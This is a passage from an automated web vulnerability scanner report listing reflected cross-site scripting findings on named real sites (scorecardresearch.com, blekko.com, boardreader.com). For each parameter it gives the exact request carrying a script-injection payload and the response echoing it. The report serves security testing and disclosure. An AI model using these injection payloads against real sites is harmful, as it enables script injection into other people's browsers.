Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"507003329d7a<script>alert(1)</script>1b41605cfe3", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.77. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113950d1<script>alert(1)</script>79857982068", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.78. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"590678989641e<script>alert(1)</script>c02414cca98", c6:"", c10:"", c15:"", c16:"", r:""});

4.79. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:55 GMT
Date: Wed, 02 Feb 2011 15:31:55 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"7176f<script>alert(1)</script>cc305f915b3", c10:"", c15:"", c16:"", r:""});

4.80. http://blekko.com/autocomplete [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blekko.com
Path:	/autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:09 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: 168498ca1c43565ea8d9e21390a38f4b

{"suggestions":[],"query":"xdef48<script>alert(1)</script>a050df307b6"}

4.81. http://blekko.com/autocomplete [term parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blekko.com
Path:	/autocomplete

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:04 GMT
Vary: Accept-Encoding
Content-Length: 58
X-Blekko-PT: 9997f158d202984eeb76c315478564b1

["{searchTerms}d17f0<script>alert(1)</script>b1b056eeebb"]

4.82. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:59 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1">
...[SNIP]...

4.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:19:53 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:54 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.84. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:02:03 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:02:10 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:01:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:45 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1">
...[SNIP]...

4.86. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:18 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1">
...[SNIP]...

4.88. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:55 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:59:00 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>

            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';

if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boardreader.com
Path:	/domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:29 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:58:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
